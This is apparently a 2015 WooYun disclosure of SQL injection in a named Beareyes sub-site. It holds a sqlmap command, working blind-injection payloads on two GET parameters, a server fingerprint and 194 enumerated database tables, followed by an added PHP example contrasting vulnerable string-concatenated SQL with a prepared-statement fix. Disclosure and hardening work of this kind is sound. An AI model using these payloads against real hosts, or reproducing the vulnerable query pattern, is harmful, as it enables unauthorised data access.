
Injection vulnerability in a sub-site of Beareyes (小熊在线)

2015-06-14 08:10

Code:
C:\sqlmap.py -u "wap.beargoo.com.cn/detail.php?menid=1626&smallid=774" --dbs

    _
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150309}
|_ -| . |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|      |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not responsible
for any misuse or damage caused by this program

[*] starting at 10:04:20

[10:04:20] [INFO] resuming back-end DBMS 'mysql'
[10:04:20] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: menid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: menid=1626 AND 8835=8835&smallid=774

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: menid=1626 AND SLEEP(5)&smallid=774

Place: GET
Parameter: smallid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: menid=1626&smallid=774 AND 8126=8126

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: menid=1626&smallid=774 AND SLEEP(5)
---
there were multiple injection points, please select the one to use for following
injections:
[0] place: GET, parameter: smallid, type: Unescaped numeric (default)
[1] place: GET, parameter: menid, type: Unescaped numeric
[q] Quit
>
[10:04:38] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.0.63, PHP 5.2.13
back-end DBMS: MySQL 5.0.11
[10:04:38] [INFO] fetching database names
[10:04:38] [INFO] fetching number of databases
[10:04:38] [INFO] resumed: 3
[10:04:38] [INFO] resumed: information_schema
[10:04:38] [INFO] resumed: flawless
[10:04:38] [INFO] resumed: test
available databases [3]:
[*] flawless
[*] information_schema
[*] test

[10:04:38] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\wap.beargoo.com.cn'

[*] shutting down at 10:04:38


Database tables:

Code:
Database: flawless
[194 tables]
+-----------------+
| adm_amlogs      |
| adm_dblogs      |
| adm_documt      |
| adm_logics      |
| adm_mbmenu      |
| adm_member      |
| adm_mgroup      |
| adm_mpower      |
| adm_seting      |
| bea_bugrep      |
| bea_buguser     |
| bear_stat       |
| bey_admins      |
| bey_brands      |
| bey_categ2      |
| bey_categ3      |
| bey_imppam      |
| bey_inspro      |
| bey_jslist      |
| bey_knames      |
| bey_lackpro     |
| bey_mandea      |
| bey_manpro      |
| bey_manuse      |
| bey_news        |
| bey_newsclass   |
| bey_pripro      |
| bey_produc      |
| bgo_voupro      |
| bij_categ2      |
| bij_produt      |
| bra_brands      |
| byn_admins      |
| byn_goods       |
| byn_images      |
| byn_notice      |
| cah_apidata     |
| cah_brands      |
| cah_ca2bra      |
| cah_ca2pro      |
| cah_ca2pro_     |
| cah_hotbra      |
| cah_itemid      |
| cah_menbra      |
| cah_menpam      |
| cah_mentlk      |
| cah_pamful      |
| cah_pamful2     |
| cah_pamsel      |
| cah_pricty      |
| cah_pridea      |
| cah_priold      |
| cah_prisal      |
| cah_pritop      |
| cah_rempid      |
| cah_remtid      |
| cah_sqlcah      |
| cli_client      |
| cmp_dealer      |
| cmp_news        |
| cms_art2pr      |
| cms_articl      |
| cms_mispro      |
| com_commet      |
| com_editor      |
| crop_img        |
| cut_cutwrd      |
| cut_derlnk      |
| cut_derwrd      |
| cut_wordlk      |
| cut_wrdpro      |
| der_action      |
| der_addnew      |
| der_admins      |
| der_advert      |
| der_bkmenu      |
| der_brader      |
| der_ca2bra      |
| der_ca2pro      |
| der_ca2shp      |
| der_caches      |
| der_cmpxy       |
| der_compay      |
| der_contro      |
| der_dealer      |
| der_defcat      |
| der_documt      |
| der_frlink      |
| der_groups      |
| der_helpfu      |
| der_idxadv      |
| der_idxtop      |
| der_idxzxu      |
| der_images      |
| der_impression  |
| der_iplibs      |
| der_kefues      |
| der_licenc      |
| der_logics      |
| der_member      |
| der_module      |
| der_mybill      |
| der_mybran      |
| der_mycont      |
| der_myitem      |
| der_mypage      |
| der_myshop      |
| der_orders      |
| der_orlist      |
| der_orshlk      |
| der_picslk      |
| der_praise      |
| der_pricty      |
| der_promot      |
| der_quecah      |
| der_queues      |
| der_quote2      |
| der_quotes      |
| der_qutcah      |
| der_qutold      |
| der_receip      |
| der_shlogi      |
| der_shpcah      |
| der_shplog      |
| der_shpsrt      |
| der_stabra      |
| der_staopn      |
| der_stapro      |
| der_stashp      |
| der_stavie      |
| der_subill      |
| der_suitem      |
| der_suites      |
| der_sysmsg      |
| der_system      |
| der_templa      |
| der_thread      |
| der_websit      |
| diy_pccate      |
| diy_pcfrom      |
| diy_pclist      |
| diy_pcpart      |
| diy_pcuser      |
| diz_frmfid      |
| idx_ca2pro      |
| man_categ1      |
| man_categ2      |
| man_catelk      |
| man_tblist      |
| man_tbpath      |
| man_tbsrt1      |
| man_tbsrt2      |
| pam_pamdef      |
| pam_pamsrt      |
| pam_pamval      |
| pam_property    |
| paw_bradlk      |
| paw_cities      |
| paw_dealer      |
| paw_distri      |
| paw_itemid      |
| paw_market      |
| paw_mentlk_stat |
| paw_prices      |
| paw_prices_old  |
| paw_prider      |
| paw_provin      |
| paw_region      |
| paw_remusr      |
| paw_websit      |
| pic_categy      |
| pic_images      |
| pic_places      |
| pic_produt      |
| pop_poppro      |
| sta_brands      |
| sta_common      |
| sta_dealer      |
| sta_interf      |
| sta_knames      |
| sta_menvie      |
| sta_number      |
| sta_pvstat      |
| sta_search      |
| sta_sqlcah      |
| tag_admin       |
| userinfo        |
| vdo_catpro      |
| vdo_provideo    |
| vie_prices      |
| vot_bervot      |
| vot_votsel      |
| vot_vottle      |
| wap_mesend      |
+-----------------+


Fix:

You know better than I do.
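As an added example that is not the report's or the site's own code: the concatenation pattern that sqlmap's "Unescaped numeric" finding on `menid` and `smallid` in `detail.php` implies, next to a hardened handler for the same two parameters (integer validation plus a PDO prepared statement, which PHP 5.2 supports). The table name `detail`, the column names, the DSN and the credentials are assumptions, and the query shape is a hypothetical reconstruction rather than the site's source.

```php
<?php
// Added example, not the site's source. Table and column names, the DSN and the
// credentials are assumptions; the query shape is a hypothetical reconstruction
// of what sqlmap's "Unescaped numeric" finding on menid/smallid implies.

// VULNERABLE PATTERN: the raw GET values are concatenated into the SQL text, so
// "menid=1626 AND SLEEP(5)" is executed as part of the WHERE clause. This is the
// behaviour the boolean-based and time-based blind payloads above rely on.
function detailQueryUnsafe(mysqli $db, array $get)
{
    $sql = "SELECT * FROM detail WHERE menid=" . $get['menid']
         . " AND smallid=" . $get['smallid'];
    return $db->query($sql);
}

// HARDENED: validate each id as a plain non-negative integer before it reaches
// the database, then bind it as a typed parameter so the DBMS never parses user
// input as SQL. Validation gives a clean 400 on tampering and a log line for
// detection; the prepared statement removes the injection even if validation
// is bypassed or forgotten elsewhere.
function requireIntParam(array $get, $name)
{
    $raw = isset($get[$name]) ? (string)$get[$name] : '';
    if (!preg_match('/^[0-9]{1,10}$/D', $raw)) {
        // Log for detection; never echo the rejected value back unescaped.
        error_log("detail.php: rejected non-integer $name=" . substr($raw, 0, 64));
        header('HTTP/1.1 400 Bad Request');   // PHP 5.2 has no http_response_code()
        exit;
    }
    return (int)$raw;
}

function detailQuerySafe(PDO $db, array $get)
{
    $menid   = requireIntParam($get, 'menid');
    $smallid = requireIntParam($get, 'smallid');
    $stmt = $db->prepare('SELECT * FROM detail WHERE menid = :menid AND smallid = :smallid');
    $stmt->bindValue(':menid',   $menid,   PDO::PARAM_INT);
    $stmt->bindValue(':smallid', $smallid, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Usage (DSN and credentials are placeholders); native prepares, not emulated.
$pdo  = new PDO('mysql:host=localhost;dbname=flawless', 'DB_USER', 'DB_PASS',
                array(PDO::ATTR_EMULATE_PREPARES => false,
                      PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION));
$rows = detailQuerySafe($pdo, $_GET);
```

The rejected-parameter log line is what a detection rule would key on: a non-integer value in `menid` or `smallid` is never legitimate traffic for this endpoint.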

Source: www.wooyun.org/bugs/wooyun-2015-0110420
